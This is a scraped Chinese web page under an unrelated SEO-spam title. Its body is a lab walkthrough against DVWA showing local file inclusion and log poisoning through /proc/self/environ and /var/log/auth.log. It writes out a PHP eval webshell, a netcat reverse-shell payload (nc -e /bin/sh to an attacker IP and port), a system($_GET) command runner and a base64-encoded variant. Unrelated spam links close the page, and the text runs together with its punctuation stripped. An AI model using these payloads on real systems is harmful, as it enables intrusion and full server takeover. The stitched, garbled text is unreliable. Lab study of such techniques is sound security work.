当前位置: 首页 > news >正文

广州网站改版设计百度云电脑版网站入口

广州网站改版设计,百度云电脑版网站入口,设计公司简介ppt范本,服务号微网站怎么做的目录 一、本地文件包含 二、日志中毒 获取反弹shell获得目标服务器的完全控制权 方法一#xff1a; 方法二#xff1a;/var/log/auth.log 一、本地文件包含 本地文件包含漏洞指的是包含本地的php文件#xff0c;而通过PHP文件包含漏洞入侵网站#xff0c;可以浏览同服务器所… 目录 一、本地文件包含 二、日志中毒 获取反弹shell获得目标服务器的完全控制权 方法一 方法二/var/log/auth.log 一、本地文件包含   本地文件包含漏洞指的是包含本地的php文件而通过PHP文件包含漏洞入侵网站可以浏览同服务器所有文件并获得webshell。 看见?page标志性注入点提示我们输入?pageindex.php 通过报错我们可以知道当前文件包含的目录路径是/var/www/dvwa/vulnerabilities/fi/ 我们可以通过../../../../../etc/passwd 试一下能不能显示默认用户账户密码 发现可以访问。所以存在本地文件包含漏洞(LFI)你可以通过这种方法访问一些密码、敏感信息文件。 二、日志中毒 如何利用LFI漏洞获得反弹shell完全控制目标主机   通过注入恶意代码到可读的文件中,然后浏览它使恶意代码被执行比如   /proc/self/environ   /var/log/auth.log   /var/log/apache2/access.log   通常使用日志文件完成因为本地文件通常会注册或写入日志文件。 举个栗子   打开burpsuite,开启代理。浏览器访问下面url抓取http包   http://192.168.164.129/dvwa/vulnerabilities/fi/?page../../../../../proc/self/environ 发现会执行代理那我们把包修改为php代码后转发试试。  修改完成转发试试结果  可以发现php代码被执行了。所以我们就可以将payload换成webshell.php中的php代码从而获得webshell。 比如注入一句话木马 ?php eval($_POST[pass]);? 然后通过蚁剑连接。 获取反弹shell获得目标服务器的完全控制权 方法一 本次换个方式从文件上传那篇知道passthru()函数是PHP执行系统命令的,这里使用netcat执行监听端口命令 构造payload为 ?passthru(nc -e /bin/sh 192.168.164.128 8888);? 然后在kali上开启监听。 Forward改好的包结果如下 成功控制目标主机。  方法二/var/log/auth.log   访问日志文件   发现22端口是开启的我们可以尝试用ssh登入看是否会被记录在日志文件中  以random账户登入随便输给密码。然后刷新浏览器页面找到random发现已经记录到了日志文件。  这说明ssh后面的命令执行了我们只要把命令替换成反弹shell的payload就ok了。 构造payload为 ?php passthru(nc -e /bin/sh 192.168.164.128 8888);? 或执行命令 ?php system($_GET[a]);? 开启监听同时ssh登入。 这里命令需要进行base64编码,编码结果如下  ?php passthru(base64_decode(bmMgLWUgL2Jpbi9zaCAxNzIuMTYuMTIuMTM3IDQ0NDQ));? 最后ssh回车车刷新浏览器页面执行注入命令反弹shell连接攻击主机。  成功控制目标主机。  /article
http://wiki.neutronadmin.com/news/26649/

相关文章:

  • 陕西专业网站开发多少钱商务网站建设策划书
  • 上海网站建设友汇网站浙江新中环建设有限公司 网站
  • 网站建设建设多少钱正规重庆妇科医院
  • 电话开发网站建设话术百度文库官网首页
  • 关于网站建设交易流程的描述一句话为什么自己做不出一个好网站
  • 苏州制作网站的公司网站备案最新备案号
  • wordpress 十个在线seo短视频
  • 相城网站建设徐州市建设局网站电话号码
  • 中国建设银行官网站电话号码垂直行业门户网站有哪些
  • 中卫网站建站设计设计网站哪个好用
  • 杭州互助盘网站开发建筑网上招工平台哪个好
  • 贵州做团队培训的网站网站建设和维护合同书
  • 电影网站是怎么做的企业手机网站建设资讯
  • 东莞网站推广外包网站 关键词 选择
  • 电商网站制作流程图wordpress略缩图图片变形怎么办
  • 2023营业执照年检入口官网四川seo关键词工具
  • 临桂建设局安全股网站wordpress api 中文
  • 新闻资讯网站模板提供微信网站建设
  • 设计一个电商网站的首页网页设计模板html代码软件
  • 电子商务网站建设模板设计导航网
  • html做企业门户网站磁力狗在线引擎
  • 网站建设的目标及服务对象跨境电商的网络营销方式
  • 什么软件可以做mv视频网站嵌入式软件开发工程师做什么
  • 新加坡网站制作蒲县网站建设
  • app合作开发福州seo推广服务
  • 兰州市建设工程质量监督站网站wordpress 引用 格式
  • 济南建设网站制作优化分析河南项目信息网
  • 什么后台做网站安全做网站是要写代码的吗
  • 怎样建立微信公众号平台seo关键词如何设置
  • 网站优缺点分析小型网站建设案例